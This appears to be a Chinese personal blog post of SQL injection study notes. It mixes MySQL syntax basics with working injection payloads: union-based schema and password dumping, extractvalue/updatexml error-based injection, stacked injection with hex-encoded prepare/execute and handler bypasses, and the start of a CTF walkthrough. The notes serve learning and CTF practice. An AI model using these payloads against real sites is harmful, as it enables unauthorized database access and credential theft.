<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="一个搞了一晚上的坑 使用SQLyog时连接不上出现1045错误,然后按照搜索出来的方法,打开PHP study关闭他的MYSQL在MYSQL文件内找到my.ini打开文件查找到 [mysqld] ，在其下方添加上一行 skip-grant-tables，然后保存。再重启MYSQL即可连接成功 MYS…">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="http://example.com/2026/09/16/55-SQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Glut4micum">
<meta property="og:description" content="一个搞了一晚上的坑 使用SQLyog时连接不上出现1045错误,然后按照搜索出来的方法,打开PHP study关闭他的MYSQL在MYSQL文件内找到my.ini打开文件查找到 [mysqld] ，在其下方添加上一行 skip-grant-tables，然后保存。再重启MYSQL即可连接成功 MYS…">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/15404df9-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/c42870fa-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/468d58bc-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/df503ce7-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/b2cd9c67-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/95636fcb-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/60dfd252-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/48d2527b-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/375dae53-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/2b1667bd-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/09395a90-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/dae2f0cb-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/f43bf156-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/3429b77e-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/b1508f3e-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/32691603-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/aca4e7d1-image.png">
<meta property="og:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/df9b62d6-image.png">
<meta property="article:published_time" content="2026-09-16T14:21:22.000Z">
<meta property="article:modified_time" content="2026-09-16T14:21:22.000Z">
<meta property="article:author" content="谷氨酸棒状杆菌">
<meta property="article:tag" content="SQL注入">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="MySQL">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/yuque-notes/02-Knowledge%20Book/assets/15404df9-image.png">

<link rel="canonical" href="http://example.com/2026/09/16/55-SQL%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SQL注入 | Glut4micum</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Glut4micum</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/09/16/55-SQL%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="谷氨酸棒状杆菌">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Glut4micum">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-09-16 22:21:22" itemprop="dateCreated datePublished" datetime="2026-09-16T22:21:22+08:00">2026-09-16</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">知识笔记</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="本文总阅读两 fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">一个搞了一晚上的坑 使用SQLyog时连接不上出现1045错误,然后按照搜索出来的方法,打开PHP study关闭他的MYSQL在MYSQL文件内找到my.ini打开文件查找到 [mysqld] ，在其下方添加上一行 skip-grant-tables，然后保存。再重启MYSQL即可连接成功 MYS…</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><h1 id="一个搞了一晚上的坑"><a href="#一个搞了一晚上的坑" class="headerlink" title="一个搞了一晚上的坑"></a>一个搞了一晚上的坑</h1><p>使用SQLyog时连接不上出现1045错误,然后按照搜索出来的方法,打开PHP study关闭他的MYSQL在MYSQL文件内找到my.ini打开文件查找到 [mysqld] ，在其下方添加上一行 skip-grant-tables，然后保存。再重启MYSQL即可连接成功</p>
<h1 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h1><p>链接数据库</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -u username -p;<span class="comment">//用户名和密码</span></span><br></pre></td></tr></table></figure>

<p>使用数据库，必须现使用use打开数据库才能读取其中的数据</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">USE 库名;</span><br></pre></td></tr></table></figure>

<p>返回当前选择的数据内可用表的列表</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SHOW TABLES;</span><br></pre></td></tr></table></figure>

<p>也可以用来显示表列</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SHOW</span> COLUMNS <span class="keyword">FROM</span> 库名;<span class="operator">/</span><span class="operator">/</span>表名</span><br></pre></td></tr></table></figure>

<h2 id="命令行"><a href="#命令行" class="headerlink" title="命令行"></a>命令行</h2><p>– :注释</p>
<p>id&#x3D;1’报错即为字符型注入</p>
<p>要找到注入点</p>
<p>order by 后面加数字</p>
<p>group by + 数字,确定列数</p>
<blockquote>
<p>-1’ union select 1,database()# 前面的-1 空出回显位</p>
</blockquote>
<h1 id="表名"><a href="#表名" class="headerlink" title="表名"></a>表名</h1><ul>
<li>information_schema</li>
</ul>
<p><code>SCHEMATA</code>表,当前root中所有数据库的信息,一般用来查到表名</p>
<p><code>TABLES</code>表:记录用户所有数据库名(TABLE_SCHEMA)和表名(TABLE_NAME)</p>
<p><code>columns</code>表:提供表中的列信息</p>
<blockquote>
<p>首先确定注入点–&gt;找到回显位置–&gt;</p>
</blockquote>
<h1 id="floor-报错"><a href="#floor-报错" class="headerlink" title="floor()报错"></a>floor()报错</h1><h1 id="extractValue报错"><a href="#extractValue报错" class="headerlink" title="extractValue报错"></a>extractValue报错</h1><blockquote>
<p>?id&#x3D;-1’ union select 1,2,extractvalue(1,concat(0x7e,(select database()))),3 –+</p>
</blockquote>
<p>​</p>
<p>extractValue(列名,’&#x2F;查询内容路径&#x2F;‘)当斜号改成别的符号,就会报错执行回显</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> extractvalue(doc,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> database())));</span><br></pre></td></tr></table></figure>

<p>conccat拼接,0x7e是~的编译,extractvalue括号内的内容即为正常查询的内容,但是默认只返回32个字符</p>
<p>substring(内容,从哪个字符开始显示,一次显示几个字符)</p>
<blockquote>
<p>?id&#x3D;-1’ union select 1,2,extractvalue(1,concat(0x7e,(select database()))),3 –+</p>
</blockquote>
<h1 id="updatexml报错"><a href="#updatexml报错" class="headerlink" title="updatexml报错"></a>updatexml报错</h1><p>updatexml(‘XML_document’,’Xpath_string’,’New_value’)</p>
<p>&#x2F;&#x2F;即</p>
<p>updatexml(‘目标xml文件名’,’在xml中查询的字符串’,’替换后的值’)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,database()),<span class="number">0</span>)<span class="operator">/</span><span class="operator">/</span><span class="keyword">select</span> 语句需要用括号括起来</span><br></pre></td></tr></table></figure>

<blockquote>
<p>?id&#x3D;1’ and updatexml(1,’~’,3) – a 判断是否为报错注入</p>
</blockquote>
<h1 id="SQL注入-1"><a href="#SQL注入-1" class="headerlink" title="SQL注入"></a>SQL注入</h1><h2 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h2><ul>
<li>information_schema</li>
</ul>
<p><code>SCHEMATA</code>表,当前root中所有数据库的信息,一般用来查到表名</p>
<p><code>TABLES</code>表:记录用户所有数据库名(TABLE_SCHEMA)和表名(TABLE_NAME)</p>
<p><code>columns</code>表:提供表中的列信息</p>
<h2 id="命令"><a href="#命令" class="headerlink" title="命令"></a>命令</h2><h3 id="SELECT-WHERE"><a href="#SELECT-WHERE" class="headerlink" title="SELECT WHERE"></a>SELECT WHERE</h3><p>语法</p>
<p>SELECT column_name,column_name（列名称）</p>
<p>FROM table_name（表名称）</p>
<p>WHERE column_name operator value;字段名称，数据满足什么条件类似if语句</p>
<p>（if（。。。。&#x3D;。。</p>
<p>printf(…)</p>
<p>）</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/15404df9-image.png" alt="image.png"></p>
<h3 id="CREATE-DEATABASE语句-创建数据库"><a href="#CREATE-DEATABASE语句-创建数据库" class="headerlink" title="CREATE DEATABASE语句,创建数据库"></a>CREATE DEATABASE语句,创建数据库</h3><p>在 MySQL 中，可以使用 CREATE DATABASE 语句创建数据库，语法格式如下：<br>CREATE DATABASE [IF NOT EXISTS] &lt;数据库名&gt;<br>[[DEFAULT] CHARACTER SET &lt;字符集名&gt;]<br>[[DEFAULT] COLLATE &lt;校对规则名&gt;];<br>[ ]中的内容是可选的。语法说明如下：<br>&lt;数据库名&gt;：创建数据库的名称。MySQL 的数据存储区将以目录方式表示 MySQL 数据库，因此数据库名称必须符合操作系统的文件夹命名规则，不能以数字开头，尽量要有实际意义。注意在 MySQL 中不区分大小写。<br>IF NOT EXISTS：在创建数据库之前进行判断，只有该数据库目前尚不存在时才能执行操作。此选项可以用来避免数据库已经存在而重复创建的错误。<br>[DEFAULT] CHARACTER SET：指定数据库的字符集。指定字符集的目的是为了避免在数据库中存储的数据出现乱码的情况。如果在创建数据库时不指定字符集，那么就使用系统的默认字符集。<br>[DEFAULT] COLLATE：指定字符集的默认校对规则。</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/c42870fa-image.png" alt="image.png"></p>
<p>创建完后刷新一下侧边栏才能看到</p>
<h3 id="creat-table-创建表"><a href="#creat-table-创建表" class="headerlink" title="creat table 创建表"></a>creat table 创建表</h3><p>create 表名(<br>列名1 定义字段的数据类型 ，<br>列名2 类型，<br>列名3 类型）</p>
<p>一个简单的建表格式，其中：</p>
<ul>
<li>字符串类型（char，varchar）需要指定长度；</li>
<li>整型（int，biging，tinyint等）和日期类型（datetime，timestamp等）只需要指定类型，不需要指定长度；</li>
<li>decimal类型需要指定精度和小数位数。</li>
</ul>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/468d58bc-image.png" alt="image.png"></p>
<h3 id="数据插入，增"><a href="#数据插入，增" class="headerlink" title="数据插入，增"></a>数据插入，增</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO TABLE_NAME (column1, column2, column3,...columnN)</span><br><span class="line">VALUES (value1, value2, value3,...valueN);</span><br><span class="line">//table_name 表名</span><br><span class="line">colimn 字段名</span><br><span class="line">value 字段数据</span><br></pre></td></tr></table></figure>

<p>写明column就会一一对应，没写就会按照顺序依次赋值</p>
<p>注字符要用单引号，否则会报错</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/df503ce7-image.png" alt="image.png"></p>
<p>这样就创建成功了使用select*from t1即可查看</p>
<h3 id="删"><a href="#删" class="headerlink" title="删"></a>删</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">DELETE FROM table_name//表名</span><br><span class="line">WHERE some_column=some_value;//条件</span><br></pre></td></tr></table></figure>

<p>用于删除表中的行</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/b2cd9c67-image.png" alt="image.png"></p>
<h3 id="改，update"><a href="#改，update" class="headerlink" title="改，update"></a>改，update</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">UPDATE table_name</span><br><span class="line">SET column1字段名=value1字段数据,column2=value2,...//更改操作</span><br><span class="line">WHERE some_column=some_value;//条件判断</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/yuque-notes/02-Knowledge%20Book/assets/95636fcb-image.png" alt="image.png"></p>
<h3 id="and-和or-运算符"><a href="#and-和or-运算符" class="headerlink" title="and 和or 运算符"></a>and 和or 运算符</h3><p><img src="/yuque-notes/02-Knowledge%20Book/assets/60dfd252-image.png" alt="image.png"></p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/48d2527b-image.png" alt="image.png"></p>
<p>or语句，当判断结果为真就会全部查询出来，也就是万能钥匙</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/375dae53-image.png" alt="image.png"></p>
<h3 id="union多表联合查询"><a href="#union多表联合查询" class="headerlink" title="union多表联合查询"></a>union多表联合查询</h3><p><img src="/yuque-notes/02-Knowledge%20Book/assets/2b1667bd-image.png" alt="image.png"></p>
<p>结果直接拼接显示， union可以对同一个表的两次查询联合起来</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/09395a90-image.png" alt="image.png"></p>
<p>用来猜测字段</p>
<h3 id="SQL注入-2"><a href="#SQL注入-2" class="headerlink" title="SQL注入"></a>SQL注入</h3><h4 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h4><p>​</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from t1 where id= x</span><br></pre></td></tr></table></figure>

<p>x&#x3D;1 or 1&#x3D;1(万能密码）</p>
<p>x&#x3D;1 union select 1,2,3…..(一个个尝试出字段)</p>
<h4 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from t1 where name= &#x27;x&#x27;</span><br></pre></td></tr></table></figure>

<p>x&#x3D;1’ or 1&#x3D;1 #—注释掉后面多出来的单引号</p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><p>通常情况下，可能存在 Sql 注入漏洞的 Url 是类似这种形式 ：<a target="_blank" rel="noopener" href="http://xxx.xxx.xxx/abcd.php?id=XX">http://xxx.xxx.xxx/abcd.php?id=XX</a></p>
<ul>
<li>判断注入点(是否存在sql注入,如果存在属于哪种注入)</li>
<li>判断是否存在漏洞( 最为经典的<strong>单引号判断法</strong>：在参数后面加上单引号, 如果页面返回错误，则存在 Sql 注入。<br>原因是无论字符型还是整型都会因为单引号个数不匹配而报错。如果未报错，不代表不存在 Sql 注入，因为有可能页面对单引号做了过滤)</li>
<li>判断注入类型</li>
</ul>
<h3 id="GROUP-CONCAT-函数"><a href="#GROUP-CONCAT-函数" class="headerlink" title="GROUP_CONCAT()函数"></a>GROUP_CONCAT()函数</h3><p>将多个字符串拼接成一个字符串</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/dae2f0cb-image.png" alt="image.png"></p>
<h3 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h3><p><code>字段数-&gt;回显位置-&gt;查阅库名-&gt;表名-&gt;字段名-&gt;查阅数据</code></p>
<ul>
<li>查库名</li>
</ul>
<p>SELECT DATABASE();– 能够知道当前在哪个数据库</p>
<p>select information_schema.<code>SCHEMATA</code></p>
<p><strong>查询所有库名:</strong></p>
<p>​</p>
<blockquote>
<p>‘ union select 1,group_concat(schema_name) from information_schema.schemata – ‘</p>
</blockquote>
<p>​</p>
<blockquote>
<p>-1’ union select 1,database()#</p>
</blockquote>
<p>​</p>
<p><strong>查表名</strong></p>
<p>​</p>
<blockquote>
<p>‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’数据库的名称’#</p>
</blockquote>
<p>​</p>
<blockquote>
<p>1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;database() –+</p>
</blockquote>
<p>​</p>
<p><strong>查字段</strong></p>
<p>​</p>
<blockquote>
<p>‘ union select 1,group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’</p>
</blockquote>
<p>​</p>
<p><strong>查获取字段信息</strong></p>
<p>​</p>
<blockquote>
<p>‘ union select 1,group_concat(password) from dvwa.users – ‘</p>
</blockquote>
<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><p>&#x2F;**&#x2F;</p>
<p>%09</p>
<p>%0a等,详情参考命令执行绕过</p>
<h3 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h3><p>– 注释符</p>
<h1 id=""><a href="#" class="headerlink" title=""></a></h1><p>&#x2F;**&#x2F;– 一般可以用来绕过空格</p>
<p>SHOW DATABASES; – 显示MySQL所有数据库名称</p>
<p>SHOW TABLES; – 显示当前数据库中所有表的名称</p>
<p>SHOW TABLES FROM sys; – 作用同上 from后面加数据库名</p>
<p>– use 数据库名 如果数据库存在，选择进入该数据库</p>
<p>USE mysql;</p>
<p>#select 查询数据,展示</p>
<p>SELECT DATABASE();– 能够知道当前在哪个数据库</p>
<p>SELECT VERSION(); – 查询当前数据库版本，知道存在的漏洞</p>
<p>SELECT USER(); – 查询用户名</p>
<h1 id="代指所有的意思"><a href="#代指所有的意思" class="headerlink" title="*代指所有的意思"></a>*代指所有的意思</h1><p>#SELECT 列名称,列名称 FROM 表名称 – （从表中读取几列）</p>
<p>SELECT *（即所有的列） FROM TABLES;</p>
<p>SELECT TABLE_CATALOG FROM TABLES;</p>
<p>SELECT * FROM SCHEMATA ;– 当前root中所有数据库的信息</p>
<p>SELECT * FROM COLUMNS – 能够看到属于哪个表，哪个数据库</p>
<h1 id="截断函数"><a href="#截断函数" class="headerlink" title="截断函数"></a>截断函数</h1><p>位数不足,需要使用截断函数进行绕过</p>
<p>substr，right，REVERSE ,mid函数</p>
<p><strong>SUBSTR (str, pos, len)</strong></p>
<p>参数说明:</p>
<ul>
<li>str为列名&#x2F;字符串；</li>
<li>pos为起始位置；mysql中的起始位置pos是从1开始的；如果为正数，就表示从正数的位置往下截取字符串（起始坐标从1开始），反之如果起始位置pos为负数，那么 表示就从倒数第几个开始截取；</li>
<li>len为截取字符个数&#x2F;长度。</li>
</ul>
<p>RIGHT(string, number_of_chars)从右侧开始读取,前一个为字符串,后一个为读取的字符数量</p>
<p>REVERSE(string)反转字符串</p>
<p>MID(string, start, length)中间为从第几位开始,最后为读取的数量</p>
<h1 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h1><p>堆叠注入原理:利用分号作为结束符,执行多条语句</p>
<p>应用场景十分有限，只在MySQL中有可能出现，原理是使用了函数<code>mysqli_multi_query()</code>执行一个或多个查询，多个查询用分号进行分隔。</p>
<h3 id="堆叠注入语句"><a href="#堆叠注入语句" class="headerlink" title="堆叠注入语句"></a>堆叠注入语句</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#查看是数据库</span><br><span class="line"><span class="string">&#x27;;show databases;</span></span><br><span class="line"><span class="string">#查看表格</span></span><br><span class="line"><span class="string">&#x27;</span>;show tables;</span><br><span class="line">#查看列</span><br><span class="line"><span class="string">&#x27;;show colums form &#x27;</span><span class="number">1919810931114514</span><span class="string">&#x27;;</span></span><br><span class="line"><span class="string">#查看数据</span></span><br><span class="line"><span class="string">&#x27;</span>;select flag from <span class="string">&#x27;1919810931114514&#x27;</span>;</span><br><span class="line"></span><br><span class="line">#十六进制类型绕过</span><br><span class="line"><span class="string">&#x27;;SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;</span></span><br></pre></td></tr></table></figure>

<p>首先判断注入类型</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/f43bf156-image.png" alt="image.png"></p>
<p>为字符型</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/3429b77e-image.png" alt="image.png"></p>
<p>判断长度为2</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/b1508f3e-image.png" alt="image.png"></p>
<p>select被过滤,结合题目,尝试堆叠注入</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/32691603-image.png" alt="image.png"></p>
<p>用show tables产看当前数据库的表名</p>
<p>之后再用<code>show columns form+\</code>表名`&#96;查看每个表里面的字段名</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/aca4e7d1-image.png" alt="image.png"></p>
<p>由于select被过滤了,大写无法绕过,因此换用另一种方法来读取内容，数字用的是反引号不是分号</p>
<h2 id="handler-句柄"><a href="#handler-句柄" class="headerlink" title="handler(句柄)"></a>handler(句柄)</h2><p>类似于指针,通过得到的表名,读取表的内容</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#打开句柄</span><br><span class="line">handler handler_table <span class="keyword">open</span>;</span><br><span class="line"># 获取第一行数据</span><br><span class="line">handler p read handler_index <span class="keyword">first</span>;</span><br><span class="line"># 获取下一行数据</span><br><span class="line">handler p read handler_index next;</span><br><span class="line"># 获取上一行数据</span><br><span class="line">handler p read handler_index prev;</span><br><span class="line"># 获取最后一行数据</span><br><span class="line">handler p read handler_index <span class="keyword">last</span>;</span><br><span class="line"># 关闭句柄</span><br><span class="line">handler p <span class="keyword">close</span>;</span><br><span class="line">p指代表名</span><br></pre></td></tr></table></figure>

<p>payload</p>
<p><code>?inject=-1&#39;;handler \</code>1919810931114514` open;handler `1919810931114514` read first; –+ &#96;</p>
<p><img src="/yuque-notes/02-Knowledge%20Book/assets/df9b62d6-image.png" alt="image.png"></p>
<h1 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h1><h2 id="updatexml报错注入"><a href="#updatexml报错注入" class="headerlink" title="updatexml报错注入"></a>updatexml报错注入</h2><h3 id="极客大挑战-2019-HardSQL"><a href="#极客大挑战-2019-HardSQL" class="headerlink" title="[极客大挑战 2019]HardSQL"></a>[极客大挑战 2019]HardSQL</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;or(updatexml(0,concat(0x5e,database()),0))#  </span><br><span class="line">爆数据库名，原理是concat(0x5e,database())拼接而成的^test_db不是合法的Xpath路径</span><br><span class="line"></span><br><span class="line">#查表名</span><br><span class="line">1&#x27;or(updatexml(0,concat(0x5e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(&#x27;geek&#x27;))),0))#</span><br><span class="line"></span><br><span class="line">#查字段</span><br><span 